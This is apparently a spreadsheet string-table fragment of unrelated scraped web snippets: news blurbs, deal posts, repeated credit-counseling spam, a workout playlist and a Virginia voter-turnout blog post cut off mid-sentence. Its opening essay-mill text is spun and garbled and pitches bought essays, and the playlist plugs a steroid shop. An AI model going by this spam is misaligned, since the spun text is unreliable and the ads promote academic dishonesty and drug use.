    <t>What You Should Do to Find Out About Narrative Essay Examples Before You’re Left Behind There are various sorts of essays. So when you have an essay assigned that you will need help with, you can purchase essay online cheap from us. Descriptive essays might be difficult if you don’t have any clue what to write about. A decent descriptive essay comes out of a knowledgeable and imaginative mind. http://markgrechanik.com Every essay should truly have an extremely clear topic. It’s simpler than an argumentative or a cause-effect essay where it is vital to supply many theses and comprehensive arguments. As you begin on your descriptive essay, it’s important that you identify just what you need to describe. Quick Tips for Writing Your Descriptive Essay Writing a descriptive essay may be rich and fulfilling experience, but nevertheless, it may also feel somewhat complicated. The major matter to be mindful about in personal descriptive essay is that there shouldn’t be any over-exaggeration. Whether you’re writing a Personal Essay a scholarship one, you can definitely benefit if you’ve got an ideal essay outline in place. All you may want to reach personal goals essays. The sort of essay you’re looking for will be provided to you within the deadline offered to you. Narrative essays are grouped under nonfiction and is founded on experience. Narrative essays includes a thesis statement, however personal they are. A narrative essay is quite personal, that is precisely why in the majority of the scenarios it is known as a personal narrative essay. In contrast, it ends when the readers are fully satisfied. Despite the first impression, it is not the easiest of all assignments. Writing a great narrative essay is dependent mostly on this issue you chose. If that’s the case, then you ought to attempt writing narrative essays. There’s more than 1 approach to compose a narrative essay. Narrative essays serve broad array of purposes. Narrative essays are told from a defined point of view, frequently the author’s, therefore there’s feeling along with specific and frequently sensory details given to find the reader involved with the elements and sequence of the story. When you compose a narrative essay, you’re telling a story. It is possible to easily buy unique college essays and don’t neglect to tell friends and family about it. Essays are available in many forms. In the exact same vein, try to remember that everyone should have the ability to read your essay and have it make sense. Nowadays it’s very hard to locate a trustworthy essay writing service. Narrative essays don’t have such arguments. Always consider the ways how your narrative essay can be useful. You will readily learn to compose perfect personal narrative essays. The debut of your essay can begin with a hook. The examples of a narrative essay here are only for you to find a clearer idea of what it is that you’re predicted to produce. You are able to discover narrative essay examples wherever you locate an excellent story. Reviewing some narrative essay examples will be able to help you to organize your information and help you decide how to compose each paragraph to acquire the best outcomes. Looking through our how to begin a personal narrative essay examples is a good beginning. Descriptive Narrative Essay Example may be used mainly to recreate an occasion. If you’re struggling to produce your very own narrative essay examples for some reason, you need to consider employing a professional academic writing service to compose that essay for you.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Busted phone leaves man in Alaskan nightmare — fending for life in Last Frontier Friday 19 July 2019 11:24 PM UTC-05 A Brooklyn man hoping to recreate an idyllic childhood on his grandparents' farm ended up getting lost in an Alaskan nightmare when his busted satellite phone left him completely cut off from the outside world. via https://youtu.be/mFQfuwZZ8h8</t>
  </si>
  <si>
    <t>Same price from ninja.buy, in case azeshop sold out Similar to the MSI X570 Gaming Pro Carbon Wi-Fi deal 16% off RRP (listing price already $4 less than RRP) + Free delivery Free 250GB WD Blue SSD via redemption USD $25 Steam credit after review the product More gift for quality review Features: Intel 802.11 a/b/g/n/ac, dual band (2.4GHz, 5GHz) up to 433 Mbps, plus Bluetooth 4.2 X570 chipset fan not under GPU card (compared to other brands) Ryzen 7 3700X / 9 3900X deal Samsung 970 Evo Plus 2TB deal Original Coupon Deal</t>
  </si>
  <si>
    <t>President Donald Trump on Monday hailed Pakistan’s help in advancing peace talks in Afghanistan, a marked shift in tone as the United States seeks an accord with the Taliban to end almost 18 years of war. Speaking from the Oval Office alongside Pakistan’s Prime Minister Imran Khan, Trump also wa… Yahoo News – Latest News &amp; Headlines The post Trump praises Pakistan's role in 'progress' on Afghan peace appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Nick Bonyhady</t>
  </si>
  <si>
    <t>The Sydney Fringe Festival has unveiled its program for its 10th anniversary year, featuring more than 340 different shows and events.</t>
  </si>
  <si>
    <t>So I decided to take a trip to Venezuela… -All my Venezuela Videos: -My Instagram: -Follow Lenny on Instagram! His photos are incredible: -My Patreon: -Lenny’s Patreon: -FREE $40 AirBNB Credit (Worldwide): -Music used in my videos (Free 30 trial): -My Facebook Page: -My Iran videos: -My Iraq videos: -PayPal ID (if you prefer to […] The post INSIDE VENEZUELA – JUNE 2019 (Surreal experience) appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>JAPAN TRAVEL: OSAKA! Day 11 The post JAPAN TRAVEL: OSAKA! Day 11 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>aaamusic</t>
  </si>
  <si>
    <t>Music can lift our spirits and get us into the right mood for whatever workout we want to do. Tracks such as “Eye of the Tiger” can get your blood pumping, but we are going way back to get you this workout playlist. The 1980s is considered the decade of fitness. Music from the ’80s was arguably perfect for getting you in the right mindset for training. Whether you are pushing for new gains or increasing your pace on the treadmill, this playlist will help you through whatever you want to do. You can grab yourself some performance enhancers from a trusted source like Valkyrie Steroids Shop, to add an extra boost to your training. Also, don’t be shocked if you find yourself rocking a pair of leg warmers and a ProDIgal running belt. 1. “Power of Love” by Huey Lewis At a tempo of 120 beats per minute, this song is among the most popular ’80s tracks that helped athletes. Whether you are taking a 4-minute run or light cardio session, this song will get you in the mood. 2. “Electric Youth” by Debbie Gibson Under the label Atlantic Records, Debbie Gibson released this energetic music track in 1989. With a pace of 129 BPM, this track is sure to get you through some light lifting and core exercises. 3. “Wanna Be Startin’ Somethin” by Michael Jackson If you want to start some leg workouts, this is the best song for it. Released in 1982, Michael Jackson packs heavy energy into this hit song from the Thriller album. 4. “Push It” by Salt-N-Pepa Salt-N-Pepa was an American hip-hop group. ‘Push It’ was a chart-topping hit in various countries. This track has the potential to push you through an intense workout session. No matter how hard your training is, this song will leave you wanting to move your body even afterwards. 5. “The Lovecats” by The Cure The Cure was a rock band with a unique flavor to their music. Their song “The Lovecats” is an exciting track with a feel-good mood to help you bust out those explosive moves and complete reps in your workout. 6. “Express Yourself” by Madonna “…what you need is a big strong hand, to lift you to a higher ground,” such lyrics from Madonna should have you maxing out any arm workout. The visuals to this song show male models working as laborers and flexing their muscles. If the song does not push you to train, then the music video surely will. 7. “Beat It” by Michael Jackson You have to hand it to Michael; he was a sensation to listen to and watch. This last song on the list is filled with joy, energy, and pure spirit. The track’s tempo of 139 BPM quickly and smoothly blends with any training program you can imagine. The ’80s may have been a bit silly and bouncy but the fact is that these years provided an excellent choice for a workout playlist. Music has the power to get us pumped up and ready to tackle new obstacles.</t>
  </si>
  <si>
    <t>Catchings, 39, flew with two-time Red Bull Air Race World Champion Kirby Chambliss in his two-seat plane over the skies of Indianapolis, testing the limits of her stomach and learning more about the world of aerobatic racing. Chambliss, from Tucson, Arizona, and his fellow Red Bull Air Race competitors will race Oct. 6-7 at IMS […] The post WNBA Champion Tamika Catchings' Wild Ride with Red Bull Air Race appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>President Donald Trump will participate in a welcome ceremony for new Defense Secretary Mark Esper. Esper was sworn in on Tuesday following an overwhelming Senate confirmation, ending a seven-month period of uncertainty at the top of the Pentagon. » Subscribe to USA TODAY: http://bit.ly/1xa3XAh » Watch more on this and other topics from USA TODAY: https://bit.ly/2WPdiBx » USA TODAY delivers current local and national news, sports, entertainment, finance, technology, and more through award-winning journalism, photos, videos and VR. source</t>
  </si>
  <si>
    <t>Gopro hero 4 silver + z1 pround source The post Phuket – koh phi phi – koh bon, Thailand 2016 – Gopro + z1 Pround appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Lisa Taddeo's work of narrative non-fiction brilliantly channels her three subjects’ distinct voices, and shows how women’s stories are heard and ignored.</t>
  </si>
  <si>
    <t>Mitch Woodcock</t>
  </si>
  <si>
    <t>Perth will host its first international netball match in four years when Australia tackles New Zealand at RAC Arena on October 27.</t>
  </si>
  <si>
    <t>Nick Dole</t>
  </si>
  <si>
    <t>The site of the new Sydney Football Stadium will be left as a giant hole in the ground for now as construction giant Lendlease is unable to meet the Government's targets for the rebuild.</t>
  </si>
  <si>
    <t>A Lebanese music festival has canceled a concert by a major indie music band, Mashrou’ Leila, after it was accused of blasphemy and received death threats because a member had shared an image of the singer Madonna as the Virgin Mary. The controversy has raised questions about religious tolerance and freedom of expression in the relatively moderate, multi-sectarian and Muslim-majority country. The Byblos International Festival, one of the country’s most popular music events, canceled the Aug. 9 concert by Mashrou’ Leila over fears of “bloodshed” after the image angered the Maronite Christian Church and prompted threats of violence from hard-line Christian critics. “Unfortunately, the national debate that ensued as a result of an organized campaign against the band and the festival goes well beyond the scope of the mission BIF is able to handle,” the festival said in a statement on Tuesday. Named after the ancient city where it has been held since 2003, Byblos has attracted musicians such as Sia, Lana Del Rey and the Scorpions, who play for thousands of fans at the seaside venue. In the 10 years since it was formed, Mashrou’ Leila (Arabic for Leila’s Project) has won millions of young fans, and its popularity has grown beyond the Arab world. A Lebanese band whose frontman is gay, Mashrou’ Leila is banned from performing in Egypt and Jordan but has performed at Byblos in the past. This time, an image of Madonna holding the infant Jesus with the caption “Madonna and fanboy” derailed its plans. The band said in a statement that the picture was part of an article shared by the band’s frontman, Hamed Sinno, on his Facebook page in 2015. It was not clear why the image became a problem years later, but the band said that it had been the victim of a smear campaign and called the decision to cancel its show “harsh and taxing.” “It is unfair to hold us responsible for what is said in campaigns of which we were the first victims,” the statement said. The cancellation came as a surprise to fans because news reports had said the band was due to appear at a news conference and apologize to those offended by its music. A group of fans gathered in the capital, Beirut, on Monday to show solidarity with the musicians. “This campaign against Mashrou’ Leila has been taken too far,” the Lebanese journalist Adel Samia said in a phone interview on Wednesday. In recent weeks, Christian groups had denounced the four-member band as devil worshipers and threatened to stop the August concert by force if necessary. Christian lawmakers joined the campaign and vowed to work with the local authorities in the city of Byblos to stop the show. This month, the Maronite Catholic Eparchy of Jbeil, a province of the church, also called for cancellation of the show, saying the band’s songs were blasphemous and an insult to Christian sanctities. The ancient city hosts a major church of the Maronites, the country’s largest Christian denomination. “It’s absurd,” Nema Salha, a fan, said on Wednesday. “The extremists dug up old songs and explained them in a way that will help their interests because they can’t accept diversity in sexuality or religion.” Band members were questioned a week ago by the state security authorities after they were accused of religious insults. Following their release hours later, two songs deemed offensive — “Djin” and “Idols” — were taken down from the band’s YouTube channel in Lebanon. The picture of the singer Madonna was also removed. Some Lebanese artists have expressed support for the band. The singer Carole Samaha said on Twitter that she was “saddened” by the show’s cancellation. The musician and composer Marcel Khalife wondered on his Facebook page if his country was becoming “a nation of fear.” Rights advocates have expressed concern over the show’s cancellation and its wider significance. “Mashrou’ Leila played the same songs at the same venue only three years ago,” Lynn Maalouf, the Middle East research director of Amnesty International, said in a statement on Tuesday. “The fact that they are now unable to perform amidst calls of hatred and violence is an alarming indicator of the deterioration of the situation with regards to freedom of expression in the country.” In response to the festival’s move, some fans on social media turned to the lyrics of the band’s song “Wa Nueid,” or “And Again.” “Tell them we are still standing,” it says. “Tell them we are still resisting.” Source link</t>
  </si>
  <si>
    <t>This episode of the English series about emergency calls focuses on domestic burglaries.</t>
  </si>
  <si>
    <t>Seven’s 2 hour The All New Monty special topped its timeslot last night at 764,000 viewers. That was ahead of Ninja Warrior: Australia vs the World (720,000), Australian Survivor (641,000 and topping the demos), and 7:30 (537,000). Due to lengthy editions there was no new battle at 8:30 however Waltzing the Dragon with Benjamin Law drew 364,000 for ABC. Any smaller lead in breakfast shows on Monday was back to a Sunrise domination on Tuesday. Seven network won Tuesday with 30.9% then Nine 28.2%, 10 18.1%, ABC 15.1% and SBS 7.8%. Seven News was #1 at 1.09m / 1.04m. Home and Away drew 672,000 then The Chase (641,000 / 376,000) and True Stories (427,000). Nine News was 927,000 / 894,000 then A Current Affair (757,000). Hot Seat was 508,000 / 282,000 and movie Fast &amp; Furious 7 (275,000). The Project was 494,000 / 274,000 for 10 then 10 News First (374,000), Celebrity Name Game (227,000) and a replay of NCIS (202,000). ABC News (686,000), Ask the Doctor (396,000), Are You Autistic? (222,000) and The Drum (212,000) also comprised ABC’s night. On SBS it was Who Do You Think You Are? (193,000) Insight (193,000), SBS World News (137,000), 8 out of 10 Cats (93,000) and Mastermind (66,000). Floogals topped multichannels for ABC KIDS on 169,000. Sunrise: 263,000 Today: 187,000 News Breakfast: 115,000 / 40,000 OzTAM Overnights: Tuesday 31 July 2019</t>
  </si>
  <si>
    <t>Carson A Merk</t>
  </si>
  <si>
    <t>After a loss to Preston North End, Newcastle United will quickly turn around and face Hibernian tomorrow. Newcastle United dropped a 2-1 friendly to Preston North End on Saturday in Steve Bruce’s first match on the touchline for the Magpies. Next up, they face Hibernian of the Scottish Premiership. We take a look at three […] Three Newcastle United players to watch vs. Hibernian –. Source</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. St. Petersburg, Florida Consumer Credit Counseling Service | (888) 551-1270 Wednesday 31 July 2019 03:53 PM UTC-05 | Tags: st-petersburg-florida-consumer-credit-counseling-service-888-551-1270 https://youtu.be/L2gSNX9jhpg St. Petersburg, Florida Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Wage Garnishment and Vehicle Repossession solutions, Mortgage Loan Modification, and Debt Settlement through chapter 13. St. Petersburg, Florida Credit counseling (888) 551-1270 starts with the parent and may include intermediaries later in life empowered by the individual debtor to act on their behalf to negotiate with creditors and resolve debt that is beyond a debtor's ability to pay. Credit counseling is a generic name and is not a brand name owned or controlled by any agency or company. St. Petersburg, Florida Consumer credit counseling services (888) 551-1270 are provided by attorneys, accountants, finance and tax professionals, for-profit, and non-profit credit counseling companies. Regulations on credit counseling and credit counseling agencies varies by country and sometimes within regions of the countries themselves. In St. Petersburg, Florida individuals filing Chapter 13 bankruptcy are required to receive counseling from a designated credit counseling agency. https://www.youtube.com/channel/UCgOTgE9ah0jCfVa9JDNHi1A/about https://t.co/JqMKB0967s — Texas Consumer Credit Counseling Service (@GeneroSebastian) July 17, 2019 https://twitter.com/GeneroSebastian/status/1151303738188947456 Tags: st-petersburg-florida-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
    <t>scotty</t>
  </si>
  <si>
    <t>Lenovo is currently doing 25% off "Web Price" on their popular IdeaPad L340 Gaming laptops. Note that the discount is applied to the "Web Price" rather than the already discounted price. For example linked L340 (15) Gaming: Web Price: $1,649 Instant Saving Price: $1,319.20 Coupon Price: $1,236.75 Specs: Intel Core i5-9300H Windows 10 Home 8GB DDR4 256GB SSD 1TB HDD 5400RPM 15.6" FHD IPS GeForce GTX 1650 4GB 2.2kg Discount also applies to the 17inch model — $1,274.25 for the same spec except with a 300nits 17.3" FHD screen and at 2.8kg.</t>
  </si>
  <si>
    <t>Scientists have discovered the first ever species of bioluminescent click beetle in Asia which remarkably appears to have evolved there for the first time. Read more? Click here</t>
  </si>
  <si>
    <t>lauradevlin</t>
  </si>
  <si>
    <t>Music lovers will flock to Slessor Gardens for Sir Tom Jones on Saturday – with one ticketholder even ditching a wedding to see the Sex Bomb star.</t>
  </si>
  <si>
    <t>baycie</t>
  </si>
  <si>
    <t>7 kids learning apps free at time of posting, usually 99c. Not sure how long they are free, so grab them while you can! Synonym Match https://itunes.apple.com/app/id778611894?at=11l3KP&amp;mt=8&amp;uo=4... Singular and Plural Match https://itunes.apple.com/app/id793591884?at=11l3KP&amp;mt=8&amp;uo=4... Antonym Match https://itunes.apple.com/app/id786868905?at=11l3KP&amp;mt=8&amp;uo=4... Compound Word Match https://itunes.apple.com/app/id796971311?at=11l3KP&amp;mt=8&amp;uo=4... Homophone Match https://itunes.apple.com/app/id794723450?at=11l3KP&amp;mt=8&amp;uo=4... Double Letter Match https://itunes.apple.com/app/id796270978?at=11l3KP&amp;mt=8&amp;uo=4... Verb Match https://itunes.apple.com/app/id1186262327?at=11l3KP&amp;mt=8&amp;uo=...</t>
  </si>
  <si>
    <t>The Chronicle have revealed two new names now being looked at by Newcastle United – Hull star Jarrod Bowen and Augsburg left-back Philipp Max. The report also claims that the club want to sign FIVE players before the window closes on August 8th – and one looks all set to be Joelinton after he was spotted at St James’ Park following his medical today. Mark Douglas’. Source</t>
  </si>
  <si>
    <t>Donald Trump should do the same.</t>
  </si>
  <si>
    <t>South Korea said on Wednesday a Japanese plan to remove South Korea from a Japanese list of countries that face minimum trade restrictions would undermine their decades-old economic and security cooperation and threaten free trade.</t>
  </si>
  <si>
    <t>(Photo by Jan Kruger/Getty Images) Foxhills Club &amp; Resort will follow in the footsteps of a famous Ryder Cup venue after its selection to host the PGA Cup for a second time in 2021. After receiving universal acclaim for its successful staging of the contest in 2017, the Surrey resort becomes only the second venue in the PGA Cup’s 46-year history to be chosen twice, following the lead of 2006 Ryder Cup host venue The K Club in Ireland (1992 and 2005). Played every two years on either side of the Atlantic between teams of PGA professionals representing Great Britain &amp; Ireland and USA, home captain Cameron Clark will attempt to claim a hat-trick of wins over America at Barton Creek Resort in Austin, Texas, in September. After the 16-10 home success in the last encounter at the Surrey venue, director of golf and leisure, Chris Fitt, is hopeful Foxhills can play its part again as the first venue to be selected for back-to-back home contests. Fitt said: “It’s a huge privilege and an honour to host this prestigious event for a second time and everyone at Foxhills is excited to be a part of another fantastic week. “I will be heading to this year’s event in Texas to experience how our American colleagues deliver the event and it’s great that the PGA has total confidence in us to deliver once again. Foxhills is no stranger to hosting prestigious tournaments and continues to raise the standards of the resort and golf facilities with significant and continued investment in recent times. Robert Maxfield, chief executive of The PGA, said: “Foxhills proved to be a popular venue for both sets of teams in 2017 with the players commenting on the excellent facilities, while the Longcross course was in fantastic condition. “Everyone involved with the PGA Cup two years ago continues to look back on that week with very fond memories and I am certain Foxhills will once again prove to be the ideal venue to showcase the talents of both sets of players from either side of the Atlantic. “We look forward to working with the team at Foxhills and I am certain the venue will prove to be a popular choice again for all of the players in two years’ time.” Foxhills Club &amp; Resort www.foxhills.co.uk Source link</t>
  </si>
  <si>
    <t>OKLAHOMA CITY – The Oklahoma City Thunder today unveiled four new uniforms for the 2019-20 season. The lineup includes a new City Edition designed in partnership with the Oklahoma City National Memorial &amp; Museum. This City uniform aligns with the upcoming 25th anniversary of the April 19, 1995 bombing of the Alfred P. Murrah Federal Building in downtown Oklahoma City. The Thunder and the memorial worked closely with Nike to embody the spirit of resilience and remembrance to pay respect to the lives lost and all those impacted by the bombing. It also captures the memorial’s mission of educating current and future generations about the Oklahoma City community’s response to the tragedy, with a focus on the Oklahoma Standard of service, honor and kindness. “April 19th, 1995 changed our city forever. The Oklahoma City National Memorial and Museum serves our community by helping us remember those lost, yet also tells a Keep reading this article on NBA.COM - NBA.</t>
  </si>
  <si>
    <t>Nathan Hine</t>
  </si>
  <si>
    <t>It has been announced that six-times World Rally Champion Sebastien Ogier will become the official ambassador of the Extreme E off-road Sports Utility Vehicle (SUV) racing series. The electric off-road motorsport category will begin in earnest in January 2021, visiting some of most extreme and endangered environments on the planet including the Arctic Circle, the Sahara Desert, the Himalayas Mountain range, Indian Ocean Islands and the Amazon Rainforest. Ogier has thrown his weight behind Extreme E, and his expertise will be utilized by organisers across the board in the lead-up to the inaugural season. He will help to advise and support on everything between Sporting and Technical Regulations to potential event locations and the design evolution of the ODYSSEY 21 Extreme E car during the intensive testing and development programme next year. six-times World Rally Champion Sebastien Ogier was delighted to be announced as the ambassador for Extreme E and said: “I am delighted to be a part of Extreme E. The championship is truly unique – there is nothing else like it out there – and I am incredibly passionate about what it is setting out to do. “With the racing spectacle will come the ability to raise awareness amongst a huge, global audience of the issues that face many environments around the world due to climate change and human interference. I am sure it can be a powerful tool in driving change and behaviours – and that notion is something very close to my heart.” The Frenchman will therefore help to aid the championship in spreading the message about the environmental issues faced by the extreme environments which Extreme E will visit. Critical to the success of the series will be how to profile the racing and the fragility of the environment in a series of docu-sport programmes, of which Ogier will help the series on such issues. Alejandro Agag, Founder of Extreme E and CEO of Formula E was delighted to confirm Ogier as the championship’s ambassador, so added: “Sébastien is among the most talented drivers in the history of motorsport and rallying. Counting on his input, support and advice throughout the development of Extreme E will prove to be invaluable. We couldn’t have a better man on-board. “Having Sébastien involved from this early stage is truly an honour and a huge endorsement of what we’re doing with the series. He is as keen as we are for Extreme E to not only provide the very best motor racing spectacle, but also the greatest positive impact on the environment and sustainability possible – we share that passion.” As the series debut grows ever-nearer, the list of entrants continues to expand as HWA AG and ABT Sportsline confirmed last week that they will join Venturi in the inaugural season of Extreme E.</t>
  </si>
  <si>
    <t>Over at “Virginia’s Conservative Voice,” Bearing Drift, Stephen Spiker has an excellent analysis on “How Vulnerable are Northam-won GOP Districts?” I definitely recommend everyone check it out. The bottom line is clear: “Turnout is the $64,000 question for 2019. We know that turnout for an off-off cycle will be lower. What we don’t know is how low, and more importantly, who will that help?” For instance, “if lower turnout in 2019 provides even just half the advantage it provided Republicans from 2013 to 2015, then Republicans increase their advantage in the House.” Of course, as Spiker correctly notes, “There are a dozen different ways you can crunch these numbers, and a dozen different reasons why this analysis is surface-level.” Still, voter turnout is an enormously important variable, one I’d argue is FAR more important than gerrymandered districts (don’t believe that? check out the House of Delegates results from the lackluster 2013 gubernatorial election year, when Democrats gained no seats at all, and compare to the huge “blue wave” of the 2017 gubernatorial election year, when Democrats gained 15 seats…and note that both of those elections occurred under the same House of Delegates district lines, so the main thing that changed was turnout). Anyway, the Bearing Drift piece motivated me to gather some voter turnout numbers from several of Virginia’s most populous cities and counties. I might add more later, but this is a VERY time-consuming process, as it’s not “one-stop shopping” on the State Board of Elections website for this data. Instead, one has to look at individual jurisdictions’ election websites, and those are not always complete. So anyway, a few hours of work led to the following graphics and writeup. See below each graphic for a few highlights that jumped out at me. The fluctuations in Prince William County’s voter turnout between presidential election years (2008, 2012, 2016) and the “off-odd” election year (2011, 2015, and now 2019) have been extreme – and the election results most definitely have reflected that! For instance, in 2008, there was big turnout (162k), with Barack Obama winning the county big over John McCain (93k-68k). Yet the very next year, turnout plummeted (to just 75k) in the gubernatorial election year, with Republican Bob McDonnell crushing Democrat Creigh Deeds (44k-31k) in the exact same county that just voted strongly for Barack Obama a year earlier. Of course, when Democratic turnout falls by two-thirds, from 93k to 31k, while Republican turnout “only” falls by about one-third, from 68k to 44k, you can see the results…a solidly “blue” county one year turns solidly “red” the next. Check out 2011 and 2012 for another stark example of this phenomenon. In 2011, voter turnout was absolutely abysmal – just 57k – and Democratic turnout was beyond abysmal, at just 15k. The result? Hard-line Republican Corey Stewart won reelection by a wide margin (33k-15k) over Democrat Babur Lateef, and the county looked solid-“red” again. But hold on one minute…or actually, one year, because in 2012, the presidential election saw HUGE turnout (180k), with Barack Obama crushing Mitt Romney (103k-74k) in the same county that, the previous November, had reelected neo-Confederate Corey Stewart. That’s basically all the result of turnout – or, more to the point, lack thereof, particularly among Democratic voters. As you can see in the 2016-2018 elections, when Prince William County voters show up at the polls in large numbers, Democrats win – overwhelmingly! Thus, in 2016, Hillary Clinton beat Donald Trump 113k-72k; in 2017, Ralph Northam defeated Ed Gillespie 75k-46k; and in 2018, Tim Kaine demolished (106k-54k) the same Corey Stewart who has kept winning reelection as PW County Board Chair, election after election. Again, that is mostly the result of turnout, although of course it’s also important to point out that the county’s getting more diverse and Democratic every year that goes by. Still, we can’t assume that Democrats will automatically win in Prince William County; if they show up, then we should win, but if not, we very well could lose. And that could impact not just the County Board Chair race, but also the Commonwealth’s Attorney race, the Sheriff’s race, the magisterial district races, and several key legislative races (e.g., Democrat Dan Helmer vs. Republican Del. Tim Hugo in HD40; Del. Hala Ayala vs. Republican Rich Anderson in HD51; Del. Lee Carter vs. Republican Ian Lovejoy in HD50; Del. Danica Roem vs. Republican Kelly McGinn in HD13; Democrat John Bell vs. Republican Geary Higgins in SD13). We see a similar, pronounced voter turnout fluctuation in Loudoun County, with much the same impact on results. For instance, in 2008, Barack Obama won Loudoun County (75k-63k), with 140k voters coming out to the polls. But then in 2009, Loudoun County voter turnout plummeted to just 66k, and Republican Bob McDonnell crushed Democrat Creigh Deed (40k-25k) for governor. Note that the Democratic vote fell from 75k in 2008 to just 25k in 2009 — again, a drop of two thirds, just like in Prince William County between 2008 and 2009. Meanwhile, the Republican vote fell, but again, only by about one-third, from 63k to 40k. So yeah, I think we can pretty much conclude that Republican turnout’s been relatively steadier than Democratic turnout, because for whatever reasons, Republican voters in places like Loudoun County and Prince William County have a higher propensity to vote in all elections than do Democratic voters. And that could potentially be a big problem in 2019. Note that in 2015, voter turnout was abysmally low (71k), yet Democrat Phyllis Randall won the County Board Chair race. How did she do that? In large part, because two opponents – Republican Charles King and Independent Scott York, who had been a Republican for years – split the Republican vote, allowing Randall to win with 37.5% of the vote. In 2016-2018, turnout was high for the presidential election, then for the first and second elections with Trump in the White House (the 2017 gubernatorial and 2018 mid-terms), with Democrats romping both times — Northam 70k-Gillespie 46k in 2017; Tim Kaine 106k-Corey Stewart 58k in 2018. Looking at the entire 2008-2018 period, Loudoun County voter turnout fluctuated from as high as 78% in 2009 to as law as 33% in 2015, the last “off/odd” election year. not to belabor the point, but how high that percentage will end up being in 100 days is absolutely crucial to the results we see on election night, November 5. The question is, again, what will turnout look like in 2019? Will it revert back more to the historic pattern, or will it stay strong in the anti-Trump backlash era, even for an election with no “statewides” on the ballot? We’re going to find out in 100 days, with turnout the key variable, IMHO. If turnout’s high, it’s quite possible that not only will Phyllis Randall win reelection (over our old pal, former Virginia Republican Chair John “Anti-Semitic Joke Dude” Whitbeck), but that Democrats will also win the Commonwealth’s Attorney race (Democratic nominee Buta Biberaj), the Sheriff’s race (Democratic nominee Justin Hannah), and some key legislative races (Democrat John Bell in SD13; Democrat Wendy Gooditis in HD10…). The wild fluctuations in voter turnout we saw in Prince William County and Loudoun County have also occurred in Fairfax County, with turnout hitting a high of 551k in the 2016 presidential election, and a low of just 187k in the last “off/odd” election year of 2015. In percentage terms, that translates into 83% turnout in 2016 vs. just 30% turnout in 2015. In 2017 and 2018, turnout was 56% and 70%, respectively, which is very strong for gubernatorial and mid-term election years. My guess is that it’s the anti-Trump effect, with the big question whether this continues in the “off/odd” election year or not. For the most part, Democrats have dominated Fairfax County, given its strong “blue” lean, but still, the level of Democratic turnout has impacted – and will likely impact this November – Board of Supervisor races, School Board races, House of Delegates and State Senate races, etc. This year, a key race that could be impacted significantly by voter turnout is the HD40 slugfest between Democrat Dan Helmer and Republican incumbent Tim Hugo. Clearly, Helmer needs high turnout to beat Hugo, while Hugo would love to see turnout low. Let’s make sure, of course, that Hugo doesn’t get his way, that turnout is super strong, and that Helmer’s the next delegate from HD40! Chesterfield County is fascinating politically speaking: solidly Republican in 2008 (McCain 86k-Obama 74k), 2009 (McDonnell 60k-Deeds 30k), 2012 (Romney 91k-Obama 78k), 2013 (Cuccinelli 51k-McAuliffe 43k), 2014 (Gillespie 53k-Warner 44k), and even 2016 (Trump 85k-Clinton 81k), but it’s been trending less red for years. In 2017, Democrats broke through in Chesterfield, with Ralph Northam defeating Ed Gillespie 59k-58k, as turnout hit an all-time high for a gubernatorial election year. Then in 2018, Democrats showed that 2017 wasn’t a fluke, with Tim Kaine beating Corey Stewart handily (83k-68k) in this once solidly red county. Note that turnout in 2018 was very strong, at 154k. For Chesterfield County Democrats to have a good election day this November 5, they’re going to need strong turnout again. Key races that could be determined by how high (or low) Democratic turnout ends up being include: Democrat Ghazala Hashmi vs. Republican Sen. Glen Sturtevant in SD10; Democrat Amanda Pohl vs. Republican Sen. Amanda Chase in SD11; Democrat Larry Barnett vs. Republican Del. Roxann Robinson in HD27; Democrat Lindsey Dougherty vs. Republican Carrie Coyner in HD62; Democrat Sheila Bynum-Coleman vs. Speaker Kirk Cox in HD66; Democratic Del. Dawn Adams vs. Republican Garrison Coward in HD68; and Democratic Commonwealth’s Attorney nominee Scott Miles. Henrico County went for Bob McDonnell over Creigh Deeds in 2009, but since then it’s been on a strong “blue streak,” with Obama winning the county easily in 2012; McAuliffe crushing Cuccinelli in 2013; Mark Warner beating Ed Gillespie handily in 2014; Hillary Clinton romping over Donald Trump in 2016; Ralph Northam crushing Ed Gillespie in 2017; Tim Kaine demolishing Corey Stewart in 2018. Turnout over those years has ranged from a high of 164k (74%) in 2016 to a low of just 59k (29%) in 2011 and 65k (31%) in 2015. Note that 2011 and 2015 were the last two “off/odd” election years, with no federal or statewide race on the ballot. The question, yet again, is what happens this time around, in an “off/odd” election year but with Trump in the White House. The higher turnout, the better, when it comes to Democratic candidates like Debra Rodman in SD12, Del. Schuyler VanValkenburg in HD72, and Rodney Willett in HD73. Note that in 2017, Debra Rodman won HD73 by a narrow, 51%-49% margin over the Republican (John O’Bannon), and that it’s now an open seat, so it could be close. And in SD12, Rodman is taking on incumbent Republican Sen. Siobhan Dunnavant, who won last time around by a 58%-38% margin, but sits in a district won by Ralph Northam (52%-47%) and Tim Kaine (57%-41%). So it’s definitely winnable, but Democrats need to turn out in large numbers to make that happen. Virginia Beach was closely divided, but leaning Republican, for many years prior to the 2017 and 2018 elections. For instance, John McCain narrowly (100k-99k) defeated Barack Obama in 2008 in Virginia Beach; Mitt Romney also narrowly (99k-94k) won in 2012; Donald Trump narrowly (98k-91k) won in 2016. But then in 2017, Ralph Northam narrowly (66k-60k) defeated Ed Gillespie. And in 2018, Tim Kaine crushed (92k-74k) Corey Stewart. So maybe Virginia Beach is trending “blue” with Trump in the White House? Turnout has fluctuated greatly in Virginia Beach, from a high of 203k (66%) in 2013 to a low of just 66k (23%) in 2015 (the last “off/odd” election year). With several key races this November — Cheryl Turpin in SD7, Missy Cotter Smasal in SD8, Del. Kelly Fowler in HD21, Nancy Guy in HD83, Karen Mallard in HD84, Alex Askew in HD85 – Democrats really need 